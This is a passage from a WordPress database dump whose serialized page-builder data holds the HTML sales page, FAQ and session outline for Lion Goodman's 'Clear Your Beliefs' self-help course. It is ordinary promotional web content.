course?</strong></p>\n\n<p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank">ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank">BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank">ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<p>// </p>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1890, 2171, 'panels_data', 'a:3:{s:7:"widgets";a:2:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:71178:"<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;\n\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n\n&nbsp;\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I''ll get,<br />and how much it costs...</a><br /></center></h1>\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\n\nNeuroscientists call the brain''s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n&nbsp;\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\n\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n<div class="icon_box bullets">\n<ul class="two-col">\n	<li><strong><em>I''m not enough.</em></strong></li>\n	<li><strong><em>I can''t do it.</em></strong></li>\n	<li><strong><em>I''m not worthy.</em></strong></li>\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\n	<li><strong><em>I''m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It''s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n\n<p><ul class="indented-img-left"><br />\n	<li>Why did I say that?</li>\n	<li>What''s wrong with me?</li>\n	<li>Why didn''t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here''s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It''s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p></div>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p></div>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n <div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p></div>\n\n <div class="parg-text"><p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p></div>\n\n <div class="parg-text"><p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p></div>\n\n <div class="parg-text"><p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p></div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n <div class="parg-text"><p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p></div>\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n <div class="parg-text"><p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p></div>\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit 